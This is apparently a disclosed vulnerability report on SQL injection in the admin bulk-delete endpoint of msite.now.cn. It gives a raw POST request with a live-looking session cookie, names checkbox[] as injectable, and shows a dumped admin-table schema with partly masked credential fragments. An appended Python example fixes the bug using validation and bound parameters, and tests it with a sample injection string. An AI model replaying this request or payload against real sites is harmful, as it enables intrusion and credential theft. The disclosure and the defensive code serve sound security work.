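2015-08-19: Details reported to the vendor; awaiting vendor handling
2015-08-19: Vendor confirmed; details disclosed to the vendor only
2015-08-29: Details disclosed to core white hats and experts in related fields
2015-09-08: Details disclosed to ordinary white hats
2015-09-16: Vendor has fixed the vulnerability and proactively disclosed it; details disclosed to the public
Couldn't the vendor give a somewhat higher rank??
Site: http://msite.now.cn/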
POST /admin.php/themes/opt HTTP/1.1
Content-Length: 74
Content-Type: application/x-www-form-urlencoded
Referer: msite.now.cn
Cookie: ci_session=hQK56MKzhpj%2BX6HusFvof2tza75uUrQnnbZUBf%2B8714zwSlXEVOpgNRMqk3uEPPMLANwP0k20Xol9Po1Sg4bx9kga7LVHgK4xxoQ7RkfbwCdf%2F7VR9hVRveBHMXyQT%2FvbGgj7RcTQO%2FYumwWpKRN61fpXWreO498lXyphAgMkhZBmU9nqcBBZoWy3j8kFqDXh83ak0gOFu26SDQ0N549Au18FM0BdXN9iRmOoMiGhz%2FOPh4U9jkIJ%2BeYObuXR3laKymygSNVhXZA6YpxRynD5ajNuJrfT1szP9wZ3mRWA%2F1fRy5n2QC8rOwd3amfgkWjht%2FwrHJtfg2ddVWJaPPRj784zSz9FebO7uwwLvruxvANC%2B0%2FNp6%2FnxPurp6BZrrrrK%2FoEU6P482z%2FApxMYMAsnsHn0DuNHyap8bNSMuEVzHVXM%2F3VpAPEhuspIH%2BdbQBq1VIjtfQjTvynyU6vh2BHA%3D%3D4a5c2c5f845f0845816ca5108d2db8a9a2e071c3
Host: msite.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

action=del_all&checkbox%5b%5d=1&chkall=check&submit=%e6%89%a7%e8%a1%8c
The parameter checkbox[] is injectable
Database: webphone_center
Table: wp_admin
[8 columns]
+-------------+----------------------+
| Column      | Type                 |
+-------------+----------------------+
| action_list | text                 |
| add_time    | int(11)              |
| email       | varchar(60)          |
| last_ip     | varchar(15)          |
| last_login  | int(11)              |
| password    | varchar(32)          |
| user_id     | smallint(5) unsigned |
| user_name   | varchar(60)          |
+-------------+----------------------+
*****--------------+-********** | **********--------------+-**********2ad5e84fc29ff99 | **********--------------+-*****
The decrypted password is
*****te*****
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-08-19 17:30
Thank you for the vulnerability information!
2015-09-16: Fixed
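
One way to handle the checkbox[] values of the bulk-delete request in the report so they cannot alter the query, as an added example that is not the vendor's code or fix. Python with sqlite3 stands in for the site's actual backend; the `themes` table with an integer `id`, the `MAX_IDS` cap and all function names are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# Request body copied from the report above.
REPORTED_BODY = "action=del_all&checkbox%5b%5d=1&chkall=check&submit=%e6%89%a7%e8%a1%8c"
MAX_IDS = 100  # assumed cap on ids accepted in one bulk action


def parse_ids(body):
    """Return the checkbox[] values as a list of ints, or raise ValueError."""
    raw = parse_qs(body, keep_blank_values=True).get("checkbox[]", [])
    if not raw or len(raw) > MAX_IDS:
        raise ValueError("checkbox[] missing or too many values")
    ids = []
    for value in raw:
        # Allow-list: ASCII digits only, so no SQL syntax can reach the query.
        if not (value.isascii() and value.isdigit()):
            raise ValueError("non-numeric id rejected: %r" % value)
        ids.append(int(value))
    return ids


def delete_themes(conn, body):
    """Bulk delete with one bound placeholder per id; returns rows deleted."""
    ids = parse_ids(body)
    placeholders = ",".join("?" for _ in ids)
    # Only '?' markers are interpolated; the ids travel as bound parameters.
    cur = conn.execute("DELETE FROM themes WHERE id IN (%s)" % placeholders, ids)
    conn.commit()
    return cur.rowcount


def demo_db():
    """Constructed in-memory table standing in for the real one (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE themes (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO themes VALUES (?, ?)", [(1, "a"), (2, "b"), (3, "c")])
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(delete_themes(db, REPORTED_BODY))
    try:  # constructed non-numeric value: rejected before any SQL runs
        delete_themes(db, "action=del_all&checkbox%5b%5d=2%20OR%201%3D1")
    except ValueError as exc:
        print("rejected:", exc)
```

Validation and parameter binding are layered on purpose: the digit check rejects malformed input early and gives a loggable event, while the bound placeholders keep the query safe even if the check is later loosened.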